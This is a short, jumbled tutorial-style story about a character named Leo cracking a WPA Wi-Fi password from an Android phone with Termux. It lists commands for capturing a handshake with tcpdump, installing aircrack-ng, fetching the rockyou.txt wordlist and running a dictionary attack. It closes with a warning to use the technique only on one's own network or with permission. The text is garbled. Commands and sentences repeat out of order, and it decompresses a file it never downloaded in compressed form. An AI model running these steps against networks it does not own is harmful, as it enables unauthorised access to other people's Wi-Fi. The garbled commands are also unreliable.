sudo tcpdump -i wlan0 -s 0 -w handshake.cap Note: sudo may not work without root; on non-rooted devices, he used tcpdump -i wlan0 -w capture.cap and hoped the chip allowed promiscuous mode.
pkg update && pkg upgrade pkg install root-repo pkg install aircrack-ng He also installed tcpdump and termux-api (to check Wi-Fi status). Leo’s internal Wi-Fi couldn’t go into monitor mode. So he couldn’t use airodump-ng to scan. But he had a backup plan: capture a WPA handshake passively using tcpdump while his friend reconnected to the router. aircrack-ng termux
pkg install wget wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt gunzip rockyou.txt.gz The terminal whirred — and within minutes, aircrack-ng found the password: coffeeLover2024! . sudo tcpdump -i wlan0 -s 0 -w handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake.cap He had to download rockyou.txt first: So he couldn’t use airodump-ng to scan
And Leo’s final advice to you: “Aircrack-ng on Termux is a powerful learning tool — but respect the law. Use it on your own lab, your own router, or with explicit permission. Otherwise, you’re not a hacker; you’re a criminal.” Want to try it safely? Set up a free virtual lab with aircrack-ng on Kali Linux instead of relying on Termux’s limitations. Your future self will thank you.
